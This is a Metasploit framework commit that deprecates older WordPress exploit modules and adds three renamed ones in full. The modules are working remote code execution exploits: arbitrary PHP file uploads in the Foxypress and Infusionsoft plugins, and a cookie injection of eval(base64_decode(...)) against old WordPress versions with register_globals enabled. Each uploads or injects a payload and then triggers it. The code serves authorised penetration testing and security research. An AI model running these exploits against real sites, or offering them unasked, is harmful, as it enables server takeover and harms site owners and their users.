Land rapid7#4983, renamed WordPress modules

Author: wvu

modules/exploits/unix/webapp/php_wordpress_foxypress.rb

@@ -10,6 +10,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_foxypress_upload')
 
   def initialize(info = {})
     super(update_info(

modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb

@@ -10,6 +10,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_infusionsoft_upload')
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/unix/webapp/php_wordpress_lastpost.rb

@@ -10,6 +10,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_lastpost_exec')
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/unix/webapp/php_wordpress_optimizepress.rb

@@ -11,6 +11,9 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::HTTP::Wordpress
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_optimizepress_upload')
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/unix/webapp/php_wordpress_total_cache.rb

@@ -6,6 +6,9 @@
 class Metasploit3 < Msf::Exploit::Remote
   include Msf::HTTP::Wordpress
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_total_cache_exec')
 
   Rank = ExcellentRanking
 

modules/exploits/unix/webapp/wp_foxypress_upload.rb

@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
+      'Description'    => %q(
+          This module exploits an arbitrary PHP code execution flaw in the WordPress
+        blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
+        file upload and remote code execution via the uploadify.php script. The Foxypress
+        plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
+      ),
+      'Author'         =>
+        [
+          'Sammy FORGIT', # Vulnerability Discovery, PoC
+          'patrick' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '18991'],
+          ['OSVDB' '82652'],
+          ['BID', '53805'],
+          ['WPVDB', '6231']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
+      'DisclosureDate' => 'Jun 05 2012',
+      'DefaultTarget' => 0))
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
+    )
+
+    return Exploit::CheckCode::Detected if res && res.code == 200
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+
+    print_status("#{peer} - Sending PHP payload")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data'   => post_data.to_s
+    )
+
+    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+      print_error("#{peer} - File wasn't uploaded, aborting!")
+      return
+    end
+
+    filename = "#{Regexp.last_match[1]}.php"
+
+    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
+    register_files_for_cleanup(filename)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
+    )
+
+    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
+  end
+end

modules/exploits/unix/webapp/wp_infusionsoft_upload.rb

@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity
+        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
+        upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'g0blin',                    # Vulnerability Discovery
+          'us3r777 <[email protected]>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-6446'],
+          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
+          ['WPVDB', '7634']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
+      'DisclosureDate' => 'Sep 25 2014',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
+    )
+
+    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
+                     'Infusionsoft', 'utilities', 'code_generator.php'),
+      'method'    => 'POST',
+      'vars_post' =>
+      {
+        'fileNamePattern' => php_pagename,
+        'fileTemplate'    => payload.encoded
+      }
+    })
+
+    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
+      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+      register_files_for_cleanup(php_pagename)
+    else
+      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+    end
+
+    print_status("#{peer} - Calling payload ...")
+    send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
+                     'Infusionsoft', 'utilities', php_pagename)
+    }, 2)
+  end
+
+end

modules/exploits/unix/webapp/wp_lastpost_exec.rb

@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress cache_lastpostdate Arbitrary Code Execution',
+      'Description'    => %q{
+          This module exploits an arbitrary PHP code execution flaw in the WordPress
+        blogging software. This vulnerability is only present when the PHP 'register_globals'
+        option is enabled (common for hosting providers). All versions of WordPress prior to
+        1.5.1.3 are affected.
+      },
+      'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'hdm' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2005-2612'],
+          ['OSVDB', '18672'],
+          ['BID', '14533'],
+          ['WPVDB', '6034']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'ConnectionType' => 'find'
+            },
+          'Space'       => 512
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Aug 9 2005',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('URI', [true, "The full URI path to WordPress", "/"]),
+      ], self.class)
+  end
+
+  def exploit
+
+    enc = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"
+    str = Rex::Text.encode_base64('args[0]=eval(base64_decode('+enc+')).die()&args[1]=x')
+    data =
+      "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;"+
+      "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;"+
+      "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]="+str+
+      ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;"+
+      "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;"+
+      "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"
+
+    # Trigger the command execution bug
+    res = send_request_cgi({
+        'uri'      => normalize_uri(datastore['URI']),
+        'cookie'   => data
+      }, 25)
+
+    if (res)
+      print_status("The server returned: #{res.code} #{res.message}")
+    else
+      print_status("No response from the server")
+    end
+  end
+
+end